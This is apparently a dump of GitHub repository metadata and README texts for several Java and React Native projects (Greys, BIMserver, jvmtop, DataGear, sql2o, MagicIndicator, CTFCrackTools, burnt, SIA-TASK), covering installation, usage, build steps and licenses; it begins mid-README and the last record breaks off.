cd greys-anatomy/bin
./greys-packages.sh
```
- Running
A release archive for the current version is generated under `target/`; for example, if the current version is `1.7.0.4`, the file `target/greys-1.7.0.4-bin.zip` is produced.
Building locally also installs the freshly built version on the machine, so once the build finishes the installation is complete as well.
# Afterword
## Reflections
I have been writing and maintaining this tool for five years now, and over those five years Greys has been rewritten all the way from 0.1 to the current 1.7. Along the way I have received help and advice from many people, and I plan to release 2.0 at the end of the year, which will open up Greys' underlying communication protocol and add websocket access.
I have not shared much of my years of troubleshooting experience, nor the private frustrations of a Java programmer; all of it has gone into the commands of this tool. I hope this accumulated work helps those who need it avoid a few detours, and I genuinely look forward to your feedback, which makes me happy and gives me a sense of accomplishment.
## Help us
Greys needs everyone's help to grow.
- **Share your experience with Greys**
I would love to hear your feedback and experience reports. If you have an article to share, please strip any sensitive information and email it to me at [oldmanpushcart@gmail.com](mailto:oldmanpushcart@gmail.com), and I will pass it on to more people in the field.
- **Help improve the code or documentation**
However good a piece of software is, it needs detailed documentation; however polished, there are always holes to fill. My time is very limited these days, and I hope we can work on this together.
- **If you like this tool, feel free to buy me a coffee**
To be honest, I am counting on this to buy a Maserati... just kidding. Your encouragement is what keeps me going; the amount does not matter. What matters is the goodwill behind it, and that is what drives me forward.
![alipay](https://raw.githubusercontent.com/oldmanpushcart/images/master/alipay-vlinux.png)
## Contact us
Colleagues at Alibaba can reach me on Wangwang; everyone else can contact me via [my Weibo](http://weibo.com/vlinux). It is snowing heavily in Hangzhou tonight, and West Lake should be beautiful tomorrow. Good night, everyone.
菜鸟-杜琨(dukun@alibaba-inc.com)
"
opensourceBIM/BIMserver,master,1490,604,2013-05-08T14:55:01Z,630415,141,The open source BIMserver platform,bim bim-applications bim-bots bim-server bimserver buildingsmart ifc java openbim,"BIMserver
=========
The Building Information Model server (short: BIMserver) enables you to store and manage the information of a construction (or other building related) project. Data is stored in the open data standard IFC. The BIMserver is not a fileserver, but it uses a model-driven architecture approach. This means that IFC data is stored as objects. You could see BIMserver as an IFC database, with special extra features like model checking, versioning, project structures, merging, etc. The main advantage of this approach is the ability to query, merge and filter the BIM-model and generate IFC output (i.e. files) on the fly.
Thanks to its multi-user support, multiple people can work on their own part of the dataset, while the complete dataset is updated on the fly. Other users can get notifications when the model (or a part of it) is updated.
BIMserver is built for developers. We've got a great wiki on https://github.com/opensourceBIM/BIMserver/wiki and are very active supporting developers on https://github.com/opensourceBIM/BIMserver/issues
(C) Copyright by the contributors / BIMserver.org
Licence: GNU Affero General Public License, version 3 (see http://www.gnu.org/licenses/agpl-3.0.html)
Beware: this project makes intensive use of several other projects with different licenses. Some plugins and libraries are published under a different license.
"
patric-r/jvmtop,master,1214,249,2015-07-14T12:58:49Z,268,61,"Java monitoring for the command-line, profiler included",,"jvmtop is a lightweight console application to monitor all accessible, running jvms on a machine.
In a top-like manner, it displays JVM internal metrics (e.g. memory information) of running java processes.
It's tested with different releases of Oracle JDK, IBM JDK and OpenJDK on Linux, Solaris, FreeBSD and Windows hosts.
Jvmtop requires a JDK - a JRE will not suffice.
Please note that it's currently in an alpha state -
if you experience an issue or need further help, please let us know.
Jvmtop is open-source. Check out the source code. Patches are very welcome!
Also have a look at the documentation or at a captured live-example.
```
JvmTop 0.8.0 alpha amd64 8 cpus, Linux 2.6.32-27, load avg 0.12
https://github.com/patric-r/jvmtop
PID MAIN-CLASS HPCUR HPMAX NHCUR NHMAX CPU GC VM USERNAME #T DL
3370 rapperSimpleApp 165m 455m 109m 176m 0.12% 0.00% S6U37 web 21
11272 ver.resin.Resin [ERROR: Could not attach to VM]
27338 WatchdogManager 11m 28m 23m 130m 0.00% 0.00% S6U37 web 31
19187 m.jvmtop.JvmTop 20m 3544m 13m 130m 0.93% 0.47% S6U37 web 20
16733 artup.Bootstrap 159m 455m 166m 304m 0.12% 0.00% S6U37 web 46
```
Installation
Click on the releases tab, download the
most recent tar.gz archive. Extract it, ensure that the `JAVA_HOME` environment variable points to a valid JDK and run `./jvmtop.sh`.
Further information can be found in the [INSTALL file](https://github.com/patric-r/jvmtop/blob/master/INSTALL)
08/14/2013 jvmtop 0.8.0 released
Changes:
- improved attach compatibility for all IBM JVMs
- fixed wrong CPU/GC values for IBM J9 JVMs
- in case of unsupported heap size metric retrieval, n/a will be displayed instead of 0m
- improved argument parsing, support for short options, added help (pass --help), see issue #28 (now using the great jopt-simple library)
- when passing the --once option, the terminal will not be cleared anymore (see issue #27)
- improved shell script for guessing the path if a JAVA_HOME environment variable is not present (thanks to Markus Kolb)
# Introduction
DataGear is a free, open-source data visualization and analytics platform. Build any data dashboard you want, with support for SQL, CSV, Excel, HTTP API, JSON and other data sources.
## [DataGear 4.7.0 has been released, download it from the official site!](http://www.datagear.tech)
## [DataGear Professional 1.0.0 has been released, give it a try!](http://www.datagear.tech/pro/)
# Features
- Easy-to-connect data sources
Connect at runtime to any database that ships a JDBC driver, including relational databases such as MySQL, Oracle, PostgreSQL and SQL Server, as well as big-data engines such as Elasticsearch, ClickHouse and Hive
- Versatile, dynamic datasets
Create SQL, CSV, Excel, HTTP API and JSON datasets, and make them dynamic, parameterized datasets with text, dropdown, date and time parameters to flexibly filter data for different business needs
- Rich, powerful charts
Charts can aggregate and bind multiple datasets of different formats, making year-over-year and period-over-period comparisons easy to define. More than 70 ready-to-use chart types are built in (line, bar, pie, map, radar, funnel, scatter, candlestick, Sankey and more), with support for custom chart options and for writing and uploading custom chart plugins
- Free and open dashboards
Dashboards use plain HTML pages as templates; you can import any HTML page, design dashboards visually, or edit the dashboard source freely with JavaScript, CSS and other front-end technologies. A rich built-in API supports chart linkage, drill-down, asynchronous loading, interactive forms and other personalized dashboards.
# Functionality
![screenshot/architecture.png](screenshot/architecture.png)
# Website
[http://www.datagear.tech](http://www.datagear.tech)
# Screenshots
Datasource management
![screenshot/datasource-manage.png](screenshot/datasource-manage.png)
SQL dataset
![screenshot/add-sql-dataset.png](screenshot/add-sql-dataset.png)
Dashboard editing
![screenshot/dashboard-visual-mode.gif](screenshot/dashboard-visual-mode.gif)
Dashboard display
![screenshot/template-006-dg.png](screenshot/template-006-dg.png)
Dashboard display: chart linkage
![screenshot/dashboard-map-chart-link.gif](screenshot/dashboard-map-chart-link.gif)
Dashboard display: real-time charts
![screenshot/dashboard-time-series-chart.gif](screenshot/dashboard-time-series-chart.gif)
Dashboard display: drill-down
![screenshot/dashboard-map-chart-hierarchy.gif](screenshot/dashboard-map-chart-hierarchy.gif)
Dashboard display: forms
![screenshot/dashboard-form.gif](screenshot/dashboard-form.gif)
Dashboard display: linked asynchronous chart loading
![screenshot/dashboard-link-load-chart.gif](screenshot/dashboard-link-load-chart.gif)
# Tech stack (integrated front end and back end)
- Back end
Spring Boot, Mybatis, Freemarker, Derby, Jackson, Caffeine, Spring Security
- Front end
jQuery, Vue3, PrimeVue, CodeMirror, ECharts, DataTables
# Modules
- datagear-analysis
Core data-analysis module; defines the dataset, chart and dashboard APIs
- datagear-connection
Database connection support module; defines APIs for loading JDBC drivers from a given directory and creating connections
- datagear-dataexchange
Data import/export module; defines APIs for importing and exporting data of a given datasource
- datagear-management
Business service module; defines the service-layer APIs for datasources, data analysis and other features
- datagear-meta
Datasource metadata module; defines APIs for parsing the table structure of a given datasource
- datagear-persistence
Datasource data management module; defines APIs for reading, editing and querying table data
- datagear-util
Common utilities module
- datagear-web
Web module; defines the web controllers and UI pages
- datagear-webapp
Web application module; defines the application entry point
# Requirements
Java 8+
Servlet 3.1+
# Building
## Prepare the unit-test environment
1. Install a `MySQL-8.0` database and set the password of the `root` user to `root` (or adjust the `test/config/jdbc.properties` configuration)
2. Create a test database named `dg_test`
3. Initialize the `dg_test` database with the `test/sql/test-mysql.sql` script
## Run the build command
mvn clean package
Alternatively, skip the unit-test environment and build directly with:
mvn clean package -DskipTests
After the build finishes, the distribution packages are generated under `datagear-webapp/target/datagear-[version]-packages/`.
# Debugging
1. Import `datagear` into your IDE as a Maven project
2. Run the startup class `org.datagear.webapp.DataGearApplication` of the `datagear-webapp` module in debug mode
3. Open a browser at `http://localhost:50401`
## Debugging notes
Before debugging a development branch (`dev-*`), it is recommended to back up the DataGear working directory (`[user home]/.datagear`),
because development branches modify the working directory at startup and may prevent previously used or later official releases from starting properly.
At startup the system automatically upgrades its built-in database (a Derby database under `[user home]/.datagear/derby`) according to the current version number; once the upgrade succeeds it is not run again on the next start. If you run into database errors while debugging, check the file
datagear-management/src/main/resources/org/datagear/management/ddl/datagear.sql
to find the SQL statements that need to be applied, and run them manually.
Then manually run the following SQL statement to update the system version number:
UPDATE DATAGEAR_VERSION SET VERSION_VALUE='<current version>'
For example, for version `4.6.0` you would run:
UPDATE DATAGEAR_VERSION SET VERSION_VALUE='4.6.0'
The system ships with a simple utility class, `org.datagear.web.util.DerbySqlClient`, for running SQL statements against the built-in database; it can be run directly from the IDE. Note: stop DataGear before running it.
# Copyright and license
Copyright 2018-2023 datagear.tech
DataGear is free software: you can redistribute it and/or modify it under the terms of
the GNU Lesser General Public License as published by the Free Software Foundation,
either version 3 of the License, or (at your option) any later version.
DataGear is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along with DataGear.
If not, see <https://www.gnu.org/licenses/>.
"
aaberg/sql2o,master,1131,231,2011-05-18T21:13:57Z,1785,77,"sql2o is a small library, which makes it easy to convert the result of your sql-statements into objects. No resultset hacking required. Kind of like an orm, but without the sql-generation capabilities. Supports named parameters.",,"# sql2o [![Github Actions Build](https://github.com/aaberg/sql2o/actions/workflows/pipeline.yml/badge.svg)](https://github.com/aaberg/sql2o/actions) [![Maven Central](https://img.shields.io/maven-central/v/org.sql2o/sql2o.svg)](https://search.maven.org/search?q=g:org.sql2o%20a:sql2o)
Sql2o is a small java library, with the purpose of making database interaction easy.
When fetching data from the database, the ResultSet will automatically be filled into your POJO objects.
Kind of like an ORM, but without the SQL generation capabilities.
Sql2o requires Java 7 or 8 to run. Java versions later than 8 may work, but are currently not supported.
# Announcements
*2024-03-12* | [Sql2o 1.7.0 was released](https://github.com/aaberg/sql2o/discussions/365)
# Examples
Check out the [sql2o website](http://www.sql2o.org) for examples.
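As a quick taste, a minimal DAO sketch might look like this (the JDBC URL, table and POJO are made up for illustration):
```java
import java.util.List;
import org.sql2o.Connection;
import org.sql2o.Sql2o;

public class TaskDao {
    // Any JDBC URL works; an in-memory H2 database is used here purely for illustration.
    private final Sql2o sql2o = new Sql2o(""jdbc:h2:mem:demo"", ""sa"", """");

    public static class Task {
        public long id;
        public String description;
        public String category;
    }

    public List<Task> findByCategory(String category) {
        String sql = ""SELECT id, description, category FROM tasks WHERE category = :category"";
        try (Connection con = sql2o.open()) {
            return con.createQuery(sql)
                      .addParameter(""category"", category)   // named parameter
                      .executeAndFetch(Task.class);          // fills the POJOs, no ResultSet hacking
        }
    }
}
```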
# Coding guidelines.
When hacking sql2o, please follow [these coding guidelines](https://github.com/aaberg/sql2o/wiki/Coding-guidelines).
"
hackware1993/MagicIndicator,main,9653,1540,2016-06-26T08:20:43Z,54746,185,"A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip —— 强大、可定制、易扩展的 ViewPager 指示器框架。是ViewPagerIndicator、TabLayout、PagerSlidingTabStrip的最佳替代品。支持角标,更支持在非ViewPager场景下使用(使用hide()、show()切换Fragment或使用setVisibility切换FrameLayout里的View等),http://www.jianshu.com/p/f3022211821c",indicator pagerslidingtabstrip tablayout viewpager viewpagerindicator,"# MagicIndicator
A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip.
[Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine.
**I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort)
[![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator)
[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252)
[![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator)
![magicindicaotor.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif)
# Usage
A few simple steps and you can integrate **MagicIndicator**:
1. check out **MagicIndicator**, which contains the source code and a demo
2. import module **magicindicator** and add dependency:
```groovy
implementation project(':magicindicator')
```
**or**
```groovy
repositories {
...
maven {
url ""https://jitpack.io""
}
}
dependencies {
...
implementation 'com.github.hackware1993:MagicIndicator:1.6.0' // for support lib
implementation 'com.github.hackware1993:MagicIndicator:1.7.0' // for androidx
}
```
3. add **MagicIndicator** to your layout xml:
```xml
```
4. find **MagicIndicator** through code, initialize it:
```java
MagicIndicator magicIndicator = (MagicIndicator) findViewById(R.id.magic_indicator);
CommonNavigator commonNavigator = new CommonNavigator(this);
commonNavigator.setAdapter(new CommonNavigatorAdapter() {
@Override
public int getCount() {
return mTitleDataList == null ? 0 : mTitleDataList.size();
}
@Override
public IPagerTitleView getTitleView(Context context, final int index) {
ColorTransitionPagerTitleView colorTransitionPagerTitleView = new ColorTransitionPagerTitleView(context);
colorTransitionPagerTitleView.setNormalColor(Color.GRAY);
colorTransitionPagerTitleView.setSelectedColor(Color.BLACK);
colorTransitionPagerTitleView.setText(mTitleDataList.get(index));
colorTransitionPagerTitleView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
mViewPager.setCurrentItem(index);
}
});
return colorTransitionPagerTitleView;
}
@Override
public IPagerIndicator getIndicator(Context context) {
LinePagerIndicator indicator = new LinePagerIndicator(context);
indicator.setMode(LinePagerIndicator.MODE_WRAP_CONTENT);
return indicator;
}
});
magicIndicator.setNavigator(commonNavigator);
```
5. work with ViewPager:
```java
ViewPagerHelper.bind(magicIndicator, mViewPager);
```
**or**
work with a Fragment container (switching Fragments via hide()/show()):
```java
mFragmentContainerHelper = new FragmentContainerHelper(magicIndicator);
// ...
mFragmentContainerHelper.handlePageSelected(pageIndex); // invoke when switch Fragment
```
# Extend
**MagicIndicator** can be easily extended:
1. implement **IPagerTitleView** to customize tab:
```java
public class MyPagerTitleView extends View implements IPagerTitleView {
public MyPagerTitleView(Context context) {
super(context);
}
@Override
public void onLeave(int index, int totalCount, float leavePercent, boolean leftToRight) {
}
@Override
public void onEnter(int index, int totalCount, float enterPercent, boolean leftToRight) {
}
@Override
public void onSelected(int index, int totalCount) {
}
@Override
public void onDeselected(int index, int totalCount) {
}
}
```
2. implement **IPagerIndicator** to customize indicator:
```java
public class MyPagerIndicator extends View implements IPagerIndicator {
public MyPagerIndicator(Context context) {
super(context);
}
@Override
public void onPageSelected(int position) {
}
@Override
public void onPageScrolled(int position, float positionOffset, int positionOffsetPixels) {
}
@Override
public void onPageScrollStateChanged(int state) {
}
@Override
public void onPositionDataProvide(List dataList) {
}
}
```
3. use **CommonPagerTitleView** to load custom layout xml.
Now, enjoy yourself!
See extensions in [*app/src/main/java/net/lucode/hackware/magicindicatordemo/ext*](https://github.com/hackware1993/MagicIndicator/tree/master/app/src/main/java/net/lucode/hackware/magicindicatordemo/ext); more extensions are on the way...
# Who developed?
hackware1993@gmail.com
cfb1993@163.com
Q&A
An intermittent perfectionist.
Visit [My Blog](http://hackware.lucode.net) for more articles about MagicIndicator.
Subscribe to my WeChat official account to get the latest news about MagicIndicator. I will also share high-quality, original Flutter and Android articles there.
![official_account.webp](https://github.com/hackware1993/weiV/blob/master/official_account.webp?raw=true)
# License
```
MIT License
Copyright (c) 2016 hackware1993
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the ""Software""), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```
# More
Made it all the way down here? How about giving it a star? (Hey, don't leave, you haven't starred yet...)
"
0Chencc/CTFCrackTools,master,1774,297,2016-08-26T08:19:35Z,161782,3,"China's first CTFTools framework.中国国内首个CTF工具框架,旨在帮助CTFer快速攻克难关",ctf ctf-tools framework java jython kotlin-java python websecurity,"# CTFcrackTools-V4.0
[![Build Status](https://travis-ci.org/0Chencc/CTFCrackTools.svg?branch=master)](https://travis-ci.org/0Chencc/CTFCrackTools)
[![](https://img.shields.io/github/v/release/0chencc/ctfcracktools?label=LATEST%20VERSION)](https://github.com/0Chencc/CTFCrackTools/releases/latest)
[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://raw.githubusercontent.com/0Chencc/CTFCrackTools/master/doc/LICENSE)
[![download](https://img.shields.io/github/downloads/0chencc/ctfcracktools/total)](https://github.com/0Chencc/CTFCrackTools/releases)
[![language](https://img.shields.io/badge/Language-Java/Kotlin-orange.svg)](https://github.com/0Chencc/CTFCrackTools/)
Author: 林晨 (0chen)
Acmesec (米斯特安全) website: http://www.acmesec.cn/
This tool can now be imported as a Burp plugin; repository: [DaE](https://github.com/0Chencc/DaE)
[Buy me a coffee ☕️](#buy-me-a-coffee)
## Troubleshooting
See: [https://github.com/0Chencc/CTFCrackTools/wiki/FAQ](https://github.com/0Chencc/CTFCrackTools/wiki/FAQ)
## UI overview
Main window
![mark](img/use.gif)
Adding a plugin
![mark](img/plugin.gif)
## About the framework
Developed in a mix of Kotlin and Java.
This is probably the first tool framework in China built for CTF.
It can be used for the Crypto, Misc and other categories in CTF.
Mainstream ciphers are built in (including, but not limited to, Vigenère, Caesar and rail fence).
Users can write their own plugins, though only in Python, and doing so is very simple. (Because of Jython limitations, Python 3 is not supported for now.)
When importing a plugin, make sure the Jython file has been loaded.
Some ready-made plugins are provided in [ready-made plugins](https://github.com/0Chencc/CTFCrackTools/tree/master/%E7%8E%B0%E6%88%90%E6%8F%92%E4%BB%B6) for users.
The project keeps being improved; this rewrite keeps only part of the core code and rebuilds the UI and supporting code so that the framework can support more features.
Project: [https://github.com/0Chencc/CTFCrackTools](https://github.com/0Chencc/CTFCrackTools)
Download a pre-built release: [releases](https://github.com/0Chencc/CTFCrackTools/releases/)
## Writing plugins
![plugin](img/plugin.gif)
```Python
#-*- coding:utf-8 -*-
# Demo of a single-key plugin call
def main(input,a):
    return 'input is %s,key is %s'%(input,a)
# We want to record the plugin developer's information, so author_info must be defined to register it
def author_info():
    info = {
        ""author"":""0chen"",
        ""name"":""test_version"",
        ""key"":[""a""],
        ""describe"":""plugin describe""
    }
    return info
```
Now let's look at how these plugins work, that is, how the framework calls them.
**Function:** main
**Description:** the function the program calls when the plugin is invoked.
Definition:
```python
def main(input):
    return 'succ'
```
**Function:** author_info
**Description:** we want to record the plugin developer's information, so author_info must be defined to register it.
**author:** author information
**name:** plugin name
**key:** some ciphers need a key, and sometimes several, so the key information can be registered here; the program pops up a dialog for these values when the plugin is invoked.
**describe:** the plugin description. Because of Python 2, Chinese is not fully supported here, so describing the plugin in English is recommended.
Definition:
```python
def author_info():
    info = {
        ""author"":""0chen"",
        ""name"":""test_version"",
        ""key"":[""a""],
        ""describe"":""plugin describe""
    }
    return info
```
**The tool simply passes data in through def main(input) and reads the returned data.**
```Python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def vigenereDecrypto(ciphertext,key):
    ascii='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    keylen=len(key)
    ctlen=len(ciphertext)
    plaintext = ''
    i = 0
    while i < ctlen:
        j = i % keylen
        k = ascii.index(key[j])
        m = ascii.index(ciphertext[i])
        if m < k:
            m += 26
        plaintext += ascii[m-k]
        i += 1
    return plaintext
def author_info():
    info = {
        'name':'VigenereDecrypto',
        'author':'naiquan',
        'key':['key'],
        'describe':'VigenereDecrypto'
    }
    return info
def main(input,key):
    return vigenereDecrypto(input.replace("" "","""").upper(),key.replace("" "","""").upper())
```
Multi-parameter demo (extra parameters are registered simply as a string array, as shown in the demo below)
```python
#-*- coding:utf-8 -*-
# Demo of a multi-parameter plugin call
# a, b and c are the extra parameters; there is essentially no limit on their number (untested)
def main(input,a,b,c):
    return 'input is %s,key a is %s,key b is %s,key c is %s'%(input,a,b,c)
# We want to record the plugin developer's information, so author_info must be defined to register it
def author_info():
    info = {
        ""author"":""0chen"",
        ""name"":""test_version"",
        ""key"":[""a"",""b"",""c""],
        ""describe"":""plugin describe""
    }
    return info
```
## A few words from the author
This tool has been around since 2016. When it was first released I was still in high school and had neither the time nor the ability to keep such a widely used tool up to date. Since then I have received thanks from many CTF beginners. Over the past two years I have been busy making a living and have had little time for the project, yet many friends still reach out over QQ and WeChat with valuable suggestions, which is what keeps me updating it from time to time.
I have noticed that many vendors in China include this tool in their must-have CTF toolkits. I am very grateful for that support; it is thanks to them that tens of thousands of people use this tool. The CTF community keeps growing, and I hope this tool can keep accompanying it.
I took part in my first CTF in my second year of high school and was beaten black and blue. We noticed that the first-place team's write-up also contained a screenshot of this tool, which made me very happy. I hope it can accompany every CTFer as they grow; if anything falls short, please leave your suggestions in a GitHub issue, and I will adopt whatever is within my ability.
I will keep the project open source, and vendors are welcome to keep shipping it as a beginner's tool. Thank you all!
One more thing: the Acmesec (米斯特) security team is always looking for strong CTF players. If you would like to join us, contact admin@hi-ourlife.com
## Old versions
The only difference between the old and new versions is the UI. Version 4.0 drops the 3.0 UI that people complained about and polishes the UI of 2.0, the version a survey showed people preferred. I see no reason to keep the old version around, so that project has been set to private; if there is enough demand I will open it again. Thanks, everyone.
~~[https://github.com/Acmesec/CTFCrackTools-V2](https://github.com/Acmesec/CTFCrackTools-V2)~~
## Buy me a coffee
My company offers all kinds of security training and penetration testing; contact admin[#]hi-ourlife.com
![wechat](img/wechat.jpeg)
"
nandorojo/burnt,master,1028,31,2022-11-16T19:03:13Z,1463,9,Crunchy toasts for React Native. 🍞,,"# 🍞 burnt
Cross-platform toasts for React Native, powered by native elements.
- [Install](#installation)
- [Usage](#api)
Now with Android, iOS & Web Support.
## Alerts
https://user-images.githubusercontent.com/13172299/202289223-8a333223-3afa-49c4-a001-a70c76150ef0.mp4
## ...and Toasts
https://user-images.githubusercontent.com/13172299/231801324-3f0858a6-bd61-4d74-920f-4e77b80d26c1.mp4
## ...and Web Support
https://user-images.githubusercontent.com/13172299/236826405-b5f423bb-dafd-4013-a941-7accbea43c14.mp4
## Context
See this
[Twitter thread](https://twitter.com/FernandoTheRojo/status/1592923529644625920).
## What
This is a library with a `toast` and `alert` method for showing ephemeral UI.
On iOS, it wraps [`SPIndicator`](https://github.com/ivanvorobei/SPIndicator) and
[`AlertKit`](https://github.com/sparrowcode/AlertKit).
On Android, it wraps `ToastAndroid` from `react-native`. `Burnt.alert()` falls
back to `Burnt.toast()` on Android. This may change in a future version.
On Web, it wraps [`sonner`](https://github.com/emilkowalski/sonner) by Emil
Kowalski.
Burnt works with both the old & new architectures. It's built on top of JSI,
thanks to Expo's new module system.
## Features
- Simple, imperative `toast` that uses **native** components under the hood,
rather than using React state with JS-based UI.
- Animated icons
- iOS App Store-like `alert` popups
- Overlays on top of native iOS modals
- Loading alerts
## Modals
Displaying toasts on top of modals has always been an issue in React Native.
With Burnt, this works out of the box.
https://user-images.githubusercontent.com/13172299/231801096-2894fbf3-4df7-45d7-9c72-f80d36fd45ef.mp4
## Usage
```tsx
import * as Burnt from ""burnt"";
Burnt.toast({
title: ""Burnt installed."",
preset: ""done"",
message: ""See your downloads."",
});
```
You can also `Burnt.alert()` and `Burnt.dismissAllAlerts()`.
## TODO
- [x] iOS support
- [x] Android support
- [x] Custom iOS icons
- [x] Web support
## Installation
```sh
yarn add burnt
```
### Expo
Burnt likely requires Expo SDK 46+.
```sh
npx expo install burnt expo-build-properties
```
Add the `expo-build-properties` plugin to your `app.json`/`app.config.js`,
setting the deployment target to `13.0` (or higher):
```js
export default {
plugins: [
[
""expo-build-properties"",
{
ios: {
deploymentTarget: ""13.0"",
},
},
],
],
};
```
Then, you'll need to rebuild your dev client. Burnt will not work in Expo Go.
```sh
npx expo prebuild --clean
npx expo run:ios
```
The config plugin ensures that your iOS app has at least iOS 13 as a deployment
target, which is required for Burnt (as well as Expo SDK 47+).
### Web Support
To enable Web support, you need to add the `<Toaster />` to the root of your
app. If you're using Next.js, add this into your `_app.tsx` component.
```tsx
// _app.tsx
import { Toaster } from ""burnt/web"";
function MyApp({ Component, pageProps }) {
return (
<>
<Component {...pageProps} />
<Toaster />
</>
);
}
```
If you're using Next.js, add `burnt` to your `transpilePackages` in `next.config.js`.
```tsx
/** @type {import('next').NextConfig} */
const nextConfig = {
transpilePackages: [
// Your other packages here
""burnt""
]
}
```
To configure your `Toaster`, please reference the `sonner`
[docs](https://github.com/emilkowalski/sonner/tree/main#theme).
### Expo Web
If you're using Expo Web, you'll need to add the following to your
`metro.config.js` file:
```js
// Learn more https://docs.expo.io/guides/customizing-metro
const { getDefaultConfig } = require(""expo/metro-config"");
const config = getDefaultConfig(__dirname);
// --- burnt ---
config.resolver.sourceExts.push(""mjs"");
config.resolver.sourceExts.push(""cjs"");
// --- end burnt ---
module.exports = config;
```
### Plain React Native
```sh
pod install
```
### Solito
```sh
cd applications/app
expo install burnt expo-build-properties
npx expo prebuild --clean
npx expo run:ios
cd ../..
yarn
```
Be sure to also follow the [expo](#expo) instructions and [web](#web-support)
instructions.
## API
### `toast`
https://user-images.githubusercontent.com/13172299/202275423-300671e5-3918-4d5d-acae-0602160de252.mp4
`toast(options): Promise`
```tsx
Burnt.toast({
title: ""Congrats!"", // required
preset: ""done"", // or ""error"", ""none"", ""custom""
message: """", // optional
haptic: ""none"", // or ""success"", ""warning"", ""error""
duration: 2, // duration in seconds
shouldDismissByDrag: true,
from: ""bottom"", // ""top"" or ""bottom""
// optionally customize layout
layout: {
iconSize: {
height: 24,
width: 24,
},
},
icon: {
ios: {
// SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/.
name: ""checkmark.seal"",
color: ""#1D9BF0"",
},
web: ,
},
});
```
### `alert`
https://user-images.githubusercontent.com/13172299/202275324-4f6cb5f5-a103-49b5-993f-2030fc836edb.mp4
_The API changed since recording this video. It now uses object syntax._
`alert(options): Promise`
```tsx
import * as Burnt from ""burnt"";
export const alert = () => {
Burnt.alert({
title: ""Congrats!"", // required
preset: ""done"", // or ""error"", ""heart"", ""custom""
message: """", // optional
duration: 2, // duration in seconds
// optionally customize layout
layout: {
iconSize: {
height: 24,
width: 24,
},
},
icon: {
ios: {
// SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/.
name: ""checkmark.seal"",
color: ""#1D9BF0"",
},
web: ,
},
});
};
```
On Web, this will display a regular toast. This may change in the future.
### `dismissAllAlerts()`
Does what you think it does! In the future, I'll allow async spinners for
promises, and it'll be useful then.
## Contribute
```sh
yarn build
cd example
yarn
npx expo run:ios # do this again whenever you change native code
```
You can edit the iOS files in `ios/`, and then update the JS accordingly in
`src`.
## Thanks
Special thanks to [Tomasz Sapeta](https://twitter.com/tsapeta) for offering help
along the way.
Expo Modules made this so easy to build, and all with Swift – no Objective C.
It's my first time writing Swift, and it was truly a breeze.
"
siaorg/sia-task,master,1808,590,2019-05-15T03:23:47Z,83764,29,微服务任务调度框架,,"## About us
* Email: sia.list@creditease.cn
* Issues:
* WeChat:
Microservice Task Scheduling Platform
===
[User Guide](USERSGUIDE.md)
[Development Guide](DEVELOPGUIDE.md)
[Deployment Guide](DEPLOY.md)
[Demo](FASTSTART.md)
背景
---
无论是互联网应用或者企业级应用,都充斥着大量的批处理任务。我们常常需要一些任务调度系统帮助我们解决问题。随着微服务化架构的逐步演进,单体架构逐渐演变为分布式、微服务架构。在此的背景下,很多原先的任务调度平台已经不能满足业务系统的需求。于是出现了一些基于分布式的任务调度平台。这些平台各有其特点,但各有不足之处,比如不支持任务编排、与业务高耦合、不支持跨平台等问题。不是非常符合公司的需求,因此我们开发了微服务任务调度平台(SIA-TASK)。
SIA是我们公司基础开发平台Simple is Awesome的简称,SIA-TASK(微服务任务调度平台)是其中的一项重要产品,SIA-TASK契合当前微服务架构模式,具有跨平台,可编排,高可用,无侵入,一致性,异步并行,动态扩展,实时监控等特点。
Introduction
---
A lot of batch tasks need to be processed by task scheduling systems. The single architectures are evolving towards distributed ones. We often need distributed task scheduling platforms to handle the needs of business systems. But such platforms may not support task scheduling across OS or are coupled with business features. We therefore decided to develop SIA-TASK.
SIA (Simple is Awesome) is our basic development platform. SIA-TASK is one of the key products of SIA and can work across OS. Its features include task scheduling, high availability, non-invasiveness, consistency, asynchronous concurrent processing, dynamic scale-out and real-time monitoring, etc.
项目简介
---
SIA-TASK是任务调度的一体式解决方案。对任务进行元数据采集,然后进行任务可视化编排,最终进行任务调度,并且对任务采取全流程监控,简单易用。对业务完全无侵入,通过简单灵活的配置即可生成符合预期的任务调度模型。
